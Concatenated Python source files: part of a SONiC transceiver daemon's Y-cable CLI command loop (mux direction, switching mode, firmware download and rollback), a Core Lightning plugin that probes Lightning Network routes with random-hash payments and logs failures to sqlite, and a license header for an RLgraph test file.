sel.addSelectable(xcvrd_show_fw_cmd_tbl[asic_id])
sel.addSelectable(xcvrd_show_hwmode_dir_cmd_tbl[asic_id])
sel.addSelectable(xcvrd_config_hwmode_state_cmd_tbl[asic_id])
sel.addSelectable(xcvrd_show_hwmode_swmode_cmd_tbl[asic_id])
sel.addSelectable(xcvrd_config_hwmode_swmode_cmd_tbl[asic_id])
# Listen indefinitely for changes to the XCVRD_CMD_TABLE in the Application DB's
while True:
# Use timeout to prevent ignoring the signals we want to handle
# in signal_handler() (e.g. SIGTERM for graceful shutdown)
if self.task_stopping_event.is_set():
break
(state, selectableObj) = sel.select(SELECT_TIMEOUT)
if state == swsscommon.Select.TIMEOUT:
# Do not flood log when select times out
continue
if state != swsscommon.Select.OBJECT:
helper_logger.log_warning(
"sel.select() did not return swsscommon.Select.OBJECT for sonic_y_cable updates")
continue
# Get the redisselect object from selectable object
redisSelectObj = swsscommon.CastSelectableToRedisSelectObj(
selectableObj)
# Get the corresponding namespace from redisselect db connector object
namespace = redisSelectObj.getDbConnector().getNamespace()
asic_index = multi_asic.get_asic_index_from_namespace(namespace)
while True:
(key, op_m, fvp_m) = xcvrd_log_tbl[asic_index].pop()
if not key:
break
helper_logger.log_notice("Y_CABLE_DEBUG: trying to enable/disable debug logs")
if fvp_m:
if key is "Y_CABLE":
continue
fvp_dict = dict(fvp_m)
if "log_verbosity" in fvp_dict:
# check if xcvrd got a probe command
probe_identifier = fvp_dict["log_verbosity"]
if probe_identifier == "debug":
helper_logger.set_min_log_priority_debug()
elif probe_identifier == "notice":
helper_logger.set_min_log_priority_notice()
while True:
# show muxcable hwmode state <port>
(port, op, fvp) = xcvrd_show_hwmode_dir_cmd_tbl[asic_index].pop()
if not port:
break
if fvp:
fvp_dict = dict(fvp)
if "state" in fvp_dict:
physical_port = get_ycable_physical_port_from_logical_port(port, self.port_mapping)
if physical_port is None or physical_port == PHYSICAL_PORT_MAPPING_ERROR:
state = 'cable not present'
# error scenario update table accordingly
helper_logger.log_error(
"Error: Could not get physical port for cli command show mux hwmode muxdirection Y cable port {}".format(port))
set_result_and_delete_port('state', state, xcvrd_show_hwmode_dir_cmd_sts_tbl[asic_index], xcvrd_show_hwmode_dir_rsp_tbl[asic_index], port)
break
port_instance = get_ycable_port_instance_from_logical_port(port, self.port_mapping)
if port_instance is None or port_instance in port_mapping_error_values:
# error scenario update table accordingly
state = 'not Y-Cable port'
helper_logger.log_error(
"Error: Could not get port instance for cli command show mux hwmode muxdirection Y cable port {}".format(port))
set_result_and_delete_port('state', state, xcvrd_show_hwmode_dir_cmd_sts_tbl[asic_index], xcvrd_show_hwmode_dir_rsp_tbl[asic_index], port)
break
with y_cable_port_locks[physical_port]:
try:
read_side = port_instance.get_read_side()
except Exception as e:
read_side = None
helper_logger.log_warning("Failed to execute the get_read_side API for port {} due to {}".format(physical_port,repr(e)))
if read_side is None or read_side == port_instance.EEPROM_ERROR or read_side < 0:
state = 'unknown'
helper_logger.log_warning(
"Error: Could not get read side for cli command show mux hwmode muxdirection logical port {} and physical port {}".format(port, physical_port))
set_result_and_delete_port('state', state, xcvrd_show_hwmode_dir_cmd_sts_tbl[asic_index], xcvrd_show_hwmode_dir_rsp_tbl[asic_index], port)
break
with y_cable_port_locks[physical_port]:
try:
active_side = port_instance.get_mux_direction()
except Exception as e:
active_side = None
helper_logger.log_warning("Failed to execute the get_mux_direction API for port {} due to {}".format(physical_port,repr(e)))
if active_side is None or active_side == port_instance.EEPROM_ERROR or active_side < 0:
state = 'unknown'
helper_logger.log_warning("Error: Could not get active side for cli command show mux hwmode muxdirection logical port {} and physical port {}".format(port, physical_port))
set_result_and_delete_port('state', state, xcvrd_show_hwmode_dir_cmd_sts_tbl[asic_index], xcvrd_show_hwmode_dir_rsp_tbl[asic_index], port)
break
if read_side == active_side and (active_side == 1 or active_side == 2):
state = 'active'
elif read_side != active_side and (active_side == 1 or active_side == 2):
state = 'standby'
else:
state = 'unknown'
helper_logger.log_warning("Error: Could not get valid state for cli command show mux hwmode muxdirection logical port {} and physical port {}".format(port, physical_port))
set_result_and_delete_port('state', state, xcvrd_show_hwmode_dir_cmd_sts_tbl[asic_index], xcvrd_show_hwmode_dir_rsp_tbl[asic_index], port)
break
set_result_and_delete_port('state', state, xcvrd_show_hwmode_dir_cmd_sts_tbl[asic_index], xcvrd_show_hwmode_dir_rsp_tbl[asic_index], port)
else:
helper_logger.log_warning("Error: Wrong input param for cli command show mux hwmode muxdirection logical port {}".format(port))
set_result_and_delete_port('state', 'unknown', xcvrd_show_hwmode_dir_cmd_sts_tbl[asic_index], xcvrd_show_hwmode_dir_rsp_tbl[asic_index], port)
while True:
# Config muxcable hwmode state <active/standby> <port>
(port, op, fvp) = xcvrd_config_hwmode_state_cmd_tbl[asic_index].pop()
if not port:
break
if fvp:
fvp_dict = dict(fvp)
if "config" in fvp_dict:
config_state = str(fvp_dict["config"])
status = 'False'
physical_port = get_ycable_physical_port_from_logical_port(port, self.port_mapping)
if physical_port is None or physical_port == PHYSICAL_PORT_MAPPING_ERROR:
# error scenario update table accordingly
helper_logger.log_error(
"Error: Could not get physical port for cli command config mux hwmode state active/standby Y cable port {}".format(port))
set_result_and_delete_port('result', status, xcvrd_config_hwmode_state_cmd_sts_tbl[asic_index], xcvrd_config_hwmode_state_rsp_tbl[asic_index], port)
break
port_instance = get_ycable_port_instance_from_logical_port(port, self.port_mapping)
if port_instance is None or port_instance in port_mapping_error_values:
# error scenario update table accordingly
helper_logger.log_error(
"Error: Could not get port instance for cli command config mux hwmode state active/standby Y cable port {}".format(port))
set_result_and_delete_port('result', status, xcvrd_config_hwmode_state_cmd_sts_tbl[asic_index], xcvrd_config_hwmode_state_rsp_tbl[asic_index], port)
break
with y_cable_port_locks[physical_port]:
try:
read_side = port_instance.get_read_side()
except Exception as e:
read_side = None
helper_logger.log_warning("Failed to execute the get_read_side API for port {} due to {}".format(physical_port,repr(e)))
if read_side is None or read_side is port_instance.EEPROM_ERROR or read_side < 0:
status = 'False'
helper_logger.log_error(
"Error: Could not get read side for cli command config mux hwmode state active/standby Y cable port {}".format(port))
set_result_and_delete_port('result', status, xcvrd_config_hwmode_state_cmd_sts_tbl[asic_index], xcvrd_config_hwmode_state_rsp_tbl[asic_index], port)
break
if read_side is port_instance.TARGET_TOR_A:
if config_state == "active":
with y_cable_port_locks[physical_port]:
try:
status = port_instance.toggle_mux_to_tor_a()
except Exception as e:
status = -1
helper_logger.log_warning("Failed to execute the toggle mux ToR A API for port {} due to {}".format(physical_port,repr(e)))
elif config_state == "standby":
with y_cable_port_locks[physical_port]:
try:
status = port_instance.toggle_mux_to_tor_b()
except Exception as e:
status = -1
helper_logger.log_warning("Failed to execute the toggle mux ToR B API for port {} due to {}".format(physical_port,repr(e)))
elif read_side is port_instance.TARGET_TOR_B:
if config_state == 'active':
with y_cable_port_locks[physical_port]:
try:
status = port_instance.toggle_mux_to_tor_b()
except Exception as e:
status = -1
helper_logger.log_warning("Failed to execute the toggle mux ToR B API for port {} due to {}".format(physical_port,repr(e)))
elif config_state == "standby":
with y_cable_port_locks[physical_port]:
try:
status = port_instance.toggle_mux_to_tor_a()
except Exception as e:
status = -1
helper_logger.log_warning("Failed to execute the toggle mux ToR A API for port {} due to {}".format(physical_port,repr(e)))
else:
set_result_and_delete_port('result', status, xcvrd_show_hwmode_state_cmd_sts_tbl[asic_index], xcvrd_config_hwmode_state_rsp_tbl[asic_index], port)
helper_logger.log_error(
"Error: Could not get valid config read side for cli command config mux hwmode state active/standby Y cable port {}".format(port))
break
set_result_and_delete_port('result', status, xcvrd_config_hwmode_state_cmd_sts_tbl[asic_index], xcvrd_config_hwmode_state_rsp_tbl[asic_index], port)
else:
helper_logger.log_error("Error: Wrong input param for cli command config mux hwmode state active/standby logical port {}".format(port))
set_result_and_delete_port('result', 'False', xcvrd_show_hwmode_state_cmd_sts_tbl[asic_index], xcvrd_config_hwmode_state_rsp_tbl[asic_index], port)
while True:
# Config muxcable hwmode setswitchmode <auto/manual> <port>
(port, op, fvp) = xcvrd_show_hwmode_swmode_cmd_tbl[asic_index].pop()
if not port:
break
if fvp:
fvp_dict = dict(fvp)
if "state" in fvp_dict:
state = 'unknown'
physical_port = get_ycable_physical_port_from_logical_port(port, self.port_mapping)
if physical_port is None or physical_port == PHYSICAL_PORT_MAPPING_ERROR:
# error scenario update table accordingly
helper_logger.log_error(
"Error: Could not get physical port for cli cmd show mux hwmode switchmode Y cable port {}".format(port))
state = 'cable not present'
set_result_and_delete_port('state', state, xcvrd_show_hwmode_swmode_cmd_sts_tbl[asic_index], xcvrd_show_hwmode_swmode_rsp_tbl[asic_index], port)
break
port_instance = get_ycable_port_instance_from_logical_port(port)
if port_instance is None or port_instance in port_mapping_error_values:
# error scenario update table accordingly
helper_logger.log_error(
"Error: Could not get port instance for cli cmd show mux hwmode switchmode Y cable port {}".format(port))
state = 'not Y-Cable port'
set_result_and_delete_port('state', state, xcvrd_show_hwmode_swmode_cmd_sts_tbl[asic_index], xcvrd_show_hwmode_swmode_rsp_tbl[asic_index], port)
break
with y_cable_port_locks[physical_port]:
try:
result = port_instance.get_switching_mode()
except Exception as e:
result = None
helper_logger.log_warning("Failed to execute the get_switching_mode for port {} due to {}".format(physical_port,repr(e)))
if result is None or result == port_instance.EEPROM_ERROR or result < 0:
helper_logger.log_error(
"Error: Could not get read side for cli cmd show mux hwmode switchmode logical port {} and physical port {}".format(port, physical_port))
set_result_and_delete_port('state', state, xcvrd_show_hwmode_swmode_cmd_sts_tbl[asic_index], xcvrd_show_hwmode_swmode_rsp_tbl[asic_index], port)
break
if result == port_instance.SWITCHING_MODE_AUTO:
state = "auto"
elif result == port_instance.SWITCHING_MODE_MANUAL:
state = "manual"
else:
state = "unknown"
set_result_and_delete_port('state', state, xcvrd_show_hwmode_swmode_cmd_sts_tbl[asic_index], xcvrd_show_hwmode_swmode_rsp_tbl[asic_index], port)
else:
helper_logger.log_error("Error: Incorrect input param for cli cmd show mux hwmode switchmode logical port {}".format(port))
set_result_and_delete_port('state', 'unknown', xcvrd_show_hwmode_swmode_cmd_sts_tbl[asic_index], xcvrd_show_hwmode_swmode_rsp_tbl[asic_index], port)
while True:
# Config muxcable hwmode setswitchmode <auto/manual> <port>
(port, op, fvp) = xcvrd_config_hwmode_swmode_cmd_tbl[asic_index].pop()
if not port:
break
if fvp:
fvp_dict = dict(fvp)
if "config" in fvp_dict:
config_mode = str(fvp_dict["config"])
status = 'False'
physical_port = get_ycable_physical_port_from_logical_port(port, self.port_mapping)
if physical_port is None or physical_port == PHYSICAL_PORT_MAPPING_ERROR:
# error scenario update table accordingly
helper_logger.log_error(
"Error: Could not get physical port for cli cmd config mux hwmode setswitchmode Y cable port {}".format(port))
set_result_and_delete_port('result', status, xcvrd_config_hwmode_swmode_cmd_sts_tbl[asic_index], xcvrd_config_hwmode_swmode_rsp_tbl[asic_index], port)
break
port_instance = get_ycable_port_instance_from_logical_port(port, self.port_mapping)
if port_instance is None or port_instance in port_mapping_error_values:
# error scenario update table accordingly
helper_logger.log_error(
"Error: Could not get port instance for cli cmd config mux hwmode setswitchmode Y cable port {}".format(port))
set_result_and_delete_port('result', status, xcvrd_config_hwmode_swmode_cmd_sts_tbl[asic_index], xcvrd_config_hwmode_swmode_rsp_tbl[asic_index], port)
break
if config_mode == "auto":
with y_cable_port_locks[physical_port]:
try:
result = port_instance.set_switching_mode(port_instance.SWITCHING_MODE_AUTO)
except Exception as e:
result = None
helper_logger.log_warning("Failed to execute the set_switching_mode auto for port {} due to {}".format(physical_port,repr(e)))
if result is None or result == port_instance.EEPROM_ERROR or result < 0:
status = 'False'
helper_logger.log_error(
"Error: Could not get read side for cli cmd config mux hwmode setswitchmode logical port {} and physical port {}".format(port, physical_port))
set_result_and_delete_port('result', status, xcvrd_config_hwmode_swmode_cmd_sts_tbl[asic_index], xcvrd_config_hwmode_swmode_rsp_tbl[asic_index], port)
break
elif config_mode == "manual":
with y_cable_port_locks[physical_port]:
try:
result = port_instance.set_switching_mode(port_instance.SWITCHING_MODE_MANUAL)
except Exception as e:
result = None
helper_logger.log_warning("Failed to execute the set_switching_mode manual for port {} due to {}".format(physical_port,repr(e)))
if result is None or result is port_instance.EEPROM_ERROR or result < 0:
status = 'False'
helper_logger.log_error(
"Error: Could not get read side for cli cmd config mux hwmode setswitchmode logical port {} and physical port {}".format(port, physical_port))
set_result_and_delete_port('result', status, xcvrd_config_hwmode_swmode_cmd_sts_tbl[asic_index], xcvrd_config_hwmode_swmode_rsp_tbl[asic_index], port)
break
else:
helper_logger.log_error(
"Error: Incorrect Config state for cli cmd config mux hwmode setswitchmode logical port {} and physical port {}".format(port, physical_port))
set_result_and_delete_port('result', status, xcvrd_config_hwmode_swmode_cmd_sts_tbl[asic_index], xcvrd_config_hwmode_swmode_rsp_tbl[asic_index], port)
break
set_result_and_delete_port('result', result, xcvrd_config_hwmode_swmode_cmd_sts_tbl[asic_index], xcvrd_config_hwmode_swmode_rsp_tbl[asic_index], port)
else:
helper_logger.log_error("Error: Incorrect input param for cli cmd config mux hwmode setswitchmode logical port {}".format(port))
set_result_and_delete_port('result', 'False', xcvrd_config_hwmode_swmode_cmd_sts_tbl[asic_index], xcvrd_config_hwmode_swmode_rsp_tbl[asic_index], port)
while True:
(port, op, fvp) = xcvrd_down_fw_cmd_tbl[asic_index].pop()
if not port:
break
if fvp:
# This check might be redundant, to check, the presence of this Port in keys
# in logical_port_list but keep for now for coherency
# also skip checking in logical_port_list inside sfp_util
fvp_dict = dict(fvp)
if "download_firmware" in fvp_dict:
file_name = fvp_dict["download_firmware"]
file_full_path = '/usr/share/sonic/firmware/{}'.format(file_name)
status = -1
if not os.path.isfile(file_full_path):
helper_logger.log_error("Error: cli cmd download firmware file does not exist port {} file {}".format(port, file_name))
set_result_and_delete_port('status', status, xcvrd_down_fw_cmd_sts_tbl[asic_index], xcvrd_down_fw_rsp_tbl[asic_index], port)
break
physical_port = get_ycable_physical_port_from_logical_port(port, self.port_mapping)
if physical_port is None or physical_port == PHYSICAL_PORT_MAPPING_ERROR:
# error scenario update table accordingly
helper_logger.log_error(
"Error: Could not get physical port for cli cmd download firmware cli Y cable port {}".format(port))
set_result_and_delete_port('status', status, xcvrd_down_fw_cmd_sts_tbl[asic_index], xcvrd_down_fw_rsp_tbl[asic_index], port)
break
port_instance = get_ycable_port_instance_from_logical_port(port, self.port_mapping)
if port_instance is None or port_instance in port_mapping_error_values:
# error scenario update table accordingly
helper_logger.log_error(
"Error: Could not get port instance for cli cmd download firmware Y cable port {}".format(port))
set_result_and_delete_port('status', status, xcvrd_down_fw_cmd_sts_tbl[asic_index], xcvrd_down_fw_rsp_tbl[asic_index], port)
break
rc = {}
self.task_download_firmware_thread[physical_port] = threading.Thread(target=task_download_firmware_worker, args=(port, physical_port, port_instance, file_full_path, xcvrd_down_fw_rsp_tbl[asic_index], xcvrd_down_fw_cmd_sts_tbl[asic_index], rc,))
self.task_download_firmware_thread[physical_port].start()
else:
helper_logger.log_error(
"Error: Wrong input parameter get for cli cmd download firmware Y cable port {}".format(port))
set_result_and_delete_port('status', '-1', xcvrd_down_fw_cmd_sts_tbl[asic_index], xcvrd_down_fw_rsp_tbl[asic_index], port)
while True:
(port, op, fvp) = xcvrd_show_fw_cmd_tbl[asic_index].pop()
if not port:
break
if fvp:
fvp_dict = dict(fvp)
mux_info_dict = {}
mux_info_dict['version_self_active'] = 'N/A'
mux_info_dict['version_self_inactive'] = 'N/A'
mux_info_dict['version_self_next'] = 'N/A'
mux_info_dict['version_peer_active'] = 'N/A'
mux_info_dict['version_peer_inactive'] = 'N/A'
mux_info_dict['version_peer_next'] = 'N/A'
mux_info_dict['version_nic_active'] = 'N/A'
mux_info_dict['version_nic_inactive'] = 'N/A'
mux_info_dict['version_nic_next'] = 'N/A'
if "firmware_version" in fvp_dict:
status = 'False'
physical_port = get_ycable_physical_port_from_logical_port(port, self.port_mapping)
if physical_port is None or physical_port == PHYSICAL_PORT_MAPPING_ERROR:
# error scenario update table accordingly
helper_logger.log_warning("Error: Could not get physical port for cli cmd show firmware port {}".format(port))
set_result_and_delete_port('status', status, xcvrd_show_fw_cmd_sts_tbl[asic_index], xcvrd_show_fw_rsp_tbl[asic_index], port)
set_show_firmware_fields(port, mux_info_dict, xcvrd_show_fw_res_tbl[asic_index])
break
port_instance = get_ycable_port_instance_from_logical_port(port, self.port_mapping)
if port_instance is None or port_instance in port_mapping_error_values:
# error scenario update table accordingly
helper_logger.log_warning("Error: Could not get port instance for cli cmd show firmware command port {}".format(port))
set_show_firmware_fields(port, mux_info_dict, xcvrd_show_fw_res_tbl[asic_index])
set_result_and_delete_port('status', status, xcvrd_show_fw_cmd_sts_tbl[asic_index], xcvrd_show_fw_rsp_tbl[asic_index], port)
break
with y_cable_port_locks[physical_port]:
try:
read_side = port_instance.get_read_side()
except Exception as e:
read_side = None
helper_logger.log_warning("Failed to execute the get_read_side API for port {} due to {}".format(physical_port,repr(e)))
if read_side is None or read_side is port_instance.EEPROM_ERROR or read_side < 0:
status = 'False'
helper_logger.log_warning("Error: Could not get read side for cli cmd show firmware port {}".format(port))
set_show_firmware_fields(port, mux_info_dict, xcvrd_show_fw_res_tbl[asic_index])
set_result_and_delete_port('status', status, xcvrd_show_fw_cmd_sts_tbl[asic_index], xcvrd_show_fw_rsp_tbl[asic_index], port)
break
get_firmware_dict(physical_port, port_instance, port_instance.TARGET_NIC, "nic", mux_info_dict, port)
if read_side == port_instance.TARGET_TOR_A:
get_firmware_dict(physical_port, port_instance, port_instance.TARGET_TOR_A, "self", mux_info_dict, port)
get_firmware_dict(physical_port, port_instance, port_instance.TARGET_TOR_B, "peer", mux_info_dict, port)
else:
get_firmware_dict(physical_port, port_instance, port_instance.TARGET_TOR_A, "peer", mux_info_dict, port)
get_firmware_dict(physical_port, port_instance, port_instance.TARGET_TOR_B, "self", mux_info_dict, port)
status = 'True'
set_show_firmware_fields(port, mux_info_dict, xcvrd_show_fw_res_tbl[asic_index])
set_result_and_delete_port('status', status, xcvrd_show_fw_cmd_sts_tbl[asic_index], xcvrd_show_fw_rsp_tbl[asic_index], port)
else:
helper_logger.log_error("Wrong param for cli cmd show firmware port {}".format(port))
set_show_firmware_fields(port, mux_info_dict, xcvrd_show_fw_res_tbl[asic_index])
set_result_and_delete_port('status', 'False', xcvrd_show_fw_cmd_sts_tbl[asic_index], xcvrd_show_fw_rsp_tbl[asic_index], port)
while True:
(port, op, fvp) = xcvrd_acti_fw_cmd_tbl[asic_index].pop()
if not port:
break
if fvp:
fvp_dict = dict(fvp)
if "activate_firmware" in fvp_dict:
file_name = fvp_dict["activate_firmware"]
status = 'False'
if file_name == 'null':
file_full_path = None
else:
file_full_path = '/usr/share/sonic/firmware/{}'.format(file_name)
if not os.path.isfile(file_full_path):
helper_logger.log_error("ERROR: cli cmd mux activate firmware file does not exist port {} file {}".format(port, file_name))
set_result_and_delete_port('status', status, xcvrd_down_fw_cmd_sts_tbl[asic_index], xcvrd_down_fw_rsp_tbl[asic_index], port)
break
physical_port = get_ycable_physical_port_from_logical_port(port, self.port_mapping)
if physical_port is None or physical_port == PHYSICAL_PORT_MAPPING_ERROR:
# error scenario update table accordingly
helper_logger.log_warning("Error: Could not get physical port for cli cmd mux activate firmware port {}".format(port))
set_result_and_delete_port('status', status, xcvrd_acti_fw_cmd_sts_tbl[asic_index], xcvrd_acti_fw_rsp_tbl[asic_index], port)
break
port_instance = get_ycable_port_instance_from_logical_port(port, self.port_mapping)
if port_instance is None or port_instance in port_mapping_error_values:
helper_logger.log_warning("Error: Could not get port instance for cli cmd mux activate firmware port {}".format(port))
# error scenario update table accordingly
set_result_and_delete_port('status', status, xcvrd_acti_fw_cmd_sts_tbl[asic_index], xcvrd_acti_fw_rsp_tbl[asic_index], port)
break
with y_cable_port_locks[physical_port]:
try:
status = port_instance.activate_firmware(file_full_path, True)
except Exception as e:
status = -1
helper_logger.log_warning("Failed to execute the activate_firmware API for port {} due to {}".format(physical_port,repr(e)))
set_result_and_delete_port('status', status, xcvrd_acti_fw_cmd_sts_tbl[asic_index], xcvrd_acti_fw_rsp_tbl[asic_index], port)
else:
helper_logger.log_error("Wrong param for cli cmd mux activate firmware port {}".format(port))
set_result_and_delete_port('status', 'False', xcvrd_acti_fw_cmd_sts_tbl[asic_index], xcvrd_acti_fw_rsp_tbl[asic_index], port)
while True:
(port, op, fvp) = xcvrd_roll_fw_cmd_tbl[asic_index].pop()
if not port:
break
if fvp:
fvp_dict = dict(fvp)
if "rollback_firmware" in fvp_dict:
file_name = fvp_dict["rollback_firmware"]
status = 'False'
if file_name == 'null':
file_full_path = None
else:
file_full_path = '/usr/share/sonic/firmware/{}'.format(file_name)
if not os.path.isfile(file_full_path):
helper_logger.log_error("Error: cli cmd mux rollback firmware file does not exist port {} file {}".format(port, file_name))
set_result_and_delete_port('status', status, xcvrd_down_fw_cmd_sts_tbl[asic_index], xcvrd_down_fw_rsp_tbl[asic_index], port)
break
physical_port = get_ycable_physical_port_from_logical_port(port, self.port_mapping)
if physical_port is None or physical_port == PHYSICAL_PORT_MAPPING_ERROR:
# error scenario update table accordingly
helper_logger.log_warning("Error: Could not get physical port for cli cmd mux rollback firmware port {}".format(port))
set_result_and_delete_port('status', status, xcvrd_roll_fw_cmd_sts_tbl[asic_index], xcvrd_roll_fw_rsp_tbl[asic_index], port)
break
port_instance = get_ycable_port_instance_from_logical_port(port, self.port_mapping)
if port_instance is None or port_instance in port_mapping_error_values:
# error scenario update table accordingly
helper_logger.log_warning("Error: Could not get port instance for cli cmd mux rollback firmware port {}".format(port))
set_result_and_delete_port('status', status, xcvrd_roll_fw_cmd_sts_tbl[asic_index], xcvrd_roll_fw_rsp_tbl[asic_index], port)
with y_cable_port_locks[physical_port]:
try:
status = port_instance.rollback_firmware(file_full_path)
except Exception as e:
status = -1
helper_logger.log_warning("Failed to execute the rollback_firmware API for port {} due to {}".format(physical_port,repr(e)))
set_result_and_delete_port('status', status, xcvrd_roll_fw_cmd_sts_tbl[asic_index], xcvrd_roll_fw_rsp_tbl[asic_index], port)
else:
helper_logger.log_error("Wrong param for cli cmd mux rollback firmware port {}".format(port))
set_result_and_delete_port('status', 'False', xcvrd_roll_fw_cmd_sts_tbl[asic_index], xcvrd_roll_fw_rsp_tbl[asic_index], port)
def task_run(self):
self.task_thread = threading.Thread(target=self.task_worker)
self.task_cli_thread = threading.Thread(target=self.task_cli_worker)
self.task_thread.start()
self.task_cli_thread.start()
def task_stop(self):
self.task_stopping_event.set()
helper_logger.log_info("stopping the cli and probing task threads xcvrd")
self.task_thread.join()
self.task_cli_thread.join()
for key, value in self.task_download_firmware_thread.items():
self.task_download_firmware_thread[key].join()
helper_logger.log_info("stopped all thread")
|
probe.py | #!/usr/bin/env python3
"""Plugin that probes the network for failed channels.
This plugin regularly performs a random probe of the network by sending a
payment to a random node in the network, with a random `payment_hash`, and
observing how the network reacts. The random `payment_hash` results in the
payments being rejected at the destination, so no funds are actually
transferred. The error messages however allow us to gather some information
about the success probability of a payment, and the stability of the channels.
The random selection of destination nodes is a worst case scenario, since it's
likely that most of the nodes in the network are leaf nodes that are not
well-connected and often offline at any point in time. Expect to see a lot of
errors about being unable to route these payments as a result of this.
The probe data is stored in a sqlite3 database for later inspection and to be
able to eventually draw pretty plots about how the network stability changes
over time. For now you can inspect the results using the `sqlite3` command
line utility:
```bash
sqlite3 ~/.lightning/probes.db "select destination, erring_channel, failcode from probes"
```
Failcode -1 and 16399 are special:
- -1 indicates that we were unable to find a route to the destination. This
usually indicates that this is a leaf node that is currently offline.
- 16399 is the code for unknown payment details and indicates a successful
probe. The destination received the incoming payment but could not find a
matching `payment_key`, which is expected since we generated the
`payment_hash` at random :-)
"""
from datetime import datetime
from pyln.client import Plugin, RpcError
from random import choice
from sqlalchemy import Column, Integer, String, DateTime
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
from time import sleep, time
import heapq
import json
import os
import random
import string
import threading
Base = declarative_base()
plugin = Plugin()
exclusions = []
temporary_exclusions = {}
class Probe(Base):
__tablename__ = "probes"
id = Column(Integer, primary_key=True)
destination = Column(String)
route = Column(String)
error = Column(String)
erring_channel = Column(String)
failcode = Column(Integer)
payment_hash = Column(String)
started_at = Column(DateTime)
finished_at = Column(DateTime)
def jsdict(self):
return {
'id': self.id,
'destination': self.destination,
'route': self.route,
'erring_channel': self.erring_channel,
'failcode': self.failcode,
'started_at': str(self.started_at),
'finished_at': str(self.finished_at),
}
def start_probe(plugin):
t = threading.Thread(target=probe, args=[plugin, None])
t.daemon = True
t.start()
@plugin.async_method('probe')
def probe(plugin, request, node_id=None, **kwargs):
res = None
if node_id is None:
nodes = plugin.rpc.listnodes()['nodes']
node_id = choice(nodes)['nodeid']
s = plugin.Session()
p = Probe(destination=node_id, started_at=datetime.now())
s.add(p)
try:
route = plugin.rpc.getroute(
node_id,
msatoshi=10000,
riskfactor=1,
exclude=exclusions + list(temporary_exclusions.keys())
)['route']
p.route = ','.join([r['channel'] for r in route])
p.payment_hash = ''.join(choice(string.hexdigits) for _ in range(64))
except RpcError:
p.failcode = -1
res = p.jsdict()
s.commit()
return request.set_result(res) if request else None
s.commit()
plugin.rpc.sendpay(route, p.payment_hash)
plugin.pending_probes.append({
'request': request,
'probe_id': p.id,
'payment_hash': p.payment_hash,
'callback': complete_probe,
'plugin': plugin,
})
@plugin.method('traceroute')
def traceroute(plugin, node_id, **kwargs):
traceroute = {
'destination': node_id,
'started_at': str(datetime.now()),
'probes': [],
}
try:
traceroute['route'] = plugin.rpc.getroute(
traceroute['destination'],
msatoshi=10000,
riskfactor=1,
)['route']
traceroute['payment_hash'] = ''.join(random.choice(string.hexdigits) for _ in range(64))
except RpcError:
traceroute['failcode'] = -1
return traceroute
# For each prefix length, shorten the route and attempt the payment
for l in range(1, len(traceroute['route'])+1):
probe = {
'route': traceroute['route'][:l],
'payment_hash': ''.join(random.choice(string.hexdigits) for _ in range(64)),
'started_at': str(datetime.now()),
}
probe['destination'] = probe['route'][-1]['id']
plugin.rpc.sendpay(probe['route'], probe['payment_hash'])
try:
plugin.rpc.waitsendpay(probe['payment_hash'], timeout=30)
raise ValueError("The recipient guessed the preimage? Cryptography is broken!!!")
except RpcError as e:
probe['finished_at'] = str(datetime.now())
if e.error['code'] == 200:
probe['error'] = "Timeout"
break
else:
probe['error'] = e.error['data']
probe['failcode'] = e.error['data']['failcode']
traceroute['probes'].append(probe)
return traceroute
@plugin.method('probe-stats')
def stats(plugin):
return {
'pending_probes': len(plugin.pending_probes),
'exclusions': len(exclusions),
'temporary_exclusions': len(temporary_exclusions),
}
def complete_probe(plugin, request, probe_id, payment_hash):
s = plugin.Session()
p = s.query(Probe).get(probe_id)
try:
plugin.rpc.waitsendpay(p.payment_hash)
except RpcError as e:
error = e.error['data']
p.erring_channel = e.error['data']['erring_channel']
p.failcode = e.error['data']['failcode']
p.error = json.dumps(error)
if p.failcode in [16392, 16394]:
exclusion = "{erring_channel}/{erring_direction}".format(**error)
print('Adding exclusion for channel {} ({} total))'.format(
exclusion, len(exclusions))
)
exclusions.append(exclusion)
if p.failcode in [21, 4103]:
exclusion = "{erring_channel}/{erring_direction}".format(**error)
print('Adding temporary exclusion for channel {} ({} total))'.format(
exclusion, len(temporary_exclusions))
)
expiry = time() + plugin.probe_exclusion_duration
temporary_exclusions[exclusion] = expiry
p.finished_at = datetime.now()
res = p.jsdict()
s.commit()
s.close()
request.set_result(res)
def poll_payments(plugin):
"""Iterate through all probes and complete the finalized ones.
"""
for probe in plugin.pending_probes:
p = plugin.rpc.listsendpays(None, payment_hash=probe['payment_hash'])
if p['payments'][0]['status'] == 'pending':
continue
plugin.pending_probes.remove(probe)
cb = probe['callback']
del probe['callback']
cb(**probe)
def clear_temporary_exclusion(plugin):
timed_out = [k for k, v in temporary_exclusions.items() if v < time()]
for k in timed_out:
del temporary_exclusions[k]
print("Removed {}/{} temporary exclusions.".format(
len(timed_out), len(temporary_exclusions))
)
def schedule(plugin):
# List of scheduled calls with next runtime, function and interval
next_runs = [
(time() + 300, clear_temporary_exclusion, 300),
(time() + plugin.probe_interval, start_probe, plugin.probe_interval),
(time() + 1, poll_payments, 1),
]
heapq.heapify(next_runs)
while True:
n = heapq.heappop(next_runs)
t = n[0] - time()
if t > 0:
sleep(t)
# Call the function
n[1](plugin)
# Schedule the next run
heapq.heappush(next_runs, (time() + n[2], n[1], n[2]))
@plugin.init()
def init(configuration, options, plugin):
plugin.probe_interval = int(options['probe-interval'])
plugin.probe_exclusion_duration = int(options['probe-exclusion-duration'])
db_filename = 'sqlite:///' + os.path.join(
configuration['lightning-dir'],
'probes.db'
)
engine = create_engine(db_filename, echo=True)
Base.metadata.create_all(engine)
plugin.Session = sessionmaker()
plugin.Session.configure(bind=engine)
t = threading.Thread(target=schedule, args=[plugin])
t.daemon = True
t.start()
# Probes that are still pending and need to be checked against.
plugin.pending_probes = []
plugin.add_option(
'probe-interval',
'3600',
'How many seconds should we wait between probes?'
)
plugin.add_option(
'probe-exclusion-duration',
'1800',
'How many seconds should temporarily failed channels be excluded?'
)
plugin.run()
|
test_fifo_queue.py | # Copyright 2018/2019 The RLgraph authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
